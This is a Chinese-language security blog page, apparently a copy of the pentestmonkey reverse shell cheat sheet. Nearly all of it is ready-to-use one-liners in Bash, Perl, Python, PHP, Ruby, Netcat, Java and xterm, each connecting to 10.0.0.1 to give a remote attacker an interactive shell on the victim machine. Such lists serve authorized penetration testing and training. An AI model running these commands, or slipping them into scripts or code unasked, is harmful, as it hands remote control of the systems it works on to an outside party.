某不知名博客 某不知名博客
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)

Carsaid

安全界的小学生
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)
  • 工具

    • 工具首页
    • 渗透类工具

      • 信息收集

      • 目录扫描

      • 漏洞综合扫描

      • 口令暴破

      • 模糊测试

      • 代码审计

      • 内网渗透

        • Metasploit
        • msfvenom
        • 反弹shell备忘单
          • python实现反弹shell
          • 反弹shell之后获取标准终端
          • Reconnoitre
          • linuxprivchecker
          • linux-exploit-suggester
          • 命令与技巧备忘单
        • 木马生成工具

      • 字典

      • 应用程序安全

      • 应急响应

    • 数据库

    • 云安全

    • 容器技术

    • 应急响应

    • 安全设备及平台

    • 面试

    • Top榜单

    • 知识库
    • 工具
    • 渗透类工具
    • 内网渗透
    carsaid
    2024-03-11
    目录

    反弹shell备忘单

    分享

    链接:https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

    - name: 分享
      desc: 链接:https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
      bgColor: '#F0DFB1'
      textColor: 'green'
    
    1
    2
    3
    4

    # 反弹shell备忘单

    搜索引擎关键字:monkey reverse shell

    # Bash

    bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
    
    1

    # PERL

    perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    
    1

    # Python

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    
    1

    # PHP

    php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
    
    1

    # Ruby

    ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    
    1

    # Netcat

    nc -e /bin/sh 10.0.0.1 1234
    
    # 或
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
    
    1
    2
    3
    4

    # Java

    r = Runtime.getRuntime()
    p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
    p.waitFor()
    
    1
    2
    3

    # xterm

    # 攻击机 - 允许目标 IP 反连到你的机器上
    xhost +targetip
    
    # 攻击机 - 监听 X-Server 服务(默认 6001 端口)
    Xnest :1
    
    # 受害机 - 执行反弹 shell
    xterm -display 10.0.0.1:1
    
    1
    2
    3
    4
    5
    6
    7
    8

    # 更多

    学习更多

    请参阅原文:https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet (opens new window)

    编辑 (opens new window)
    msfvenom
    python实现反弹shell

    ← msfvenom python实现反弹shell→

    最近更新
    01
    API测试笔记
    04-30
    02
    msfvenom
    03-29
    03
    Metasploit
    03-29
    更多文章>
    Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License
    • 跟随系统
    • 浅色模式
    • 深色模式
    • 阅读模式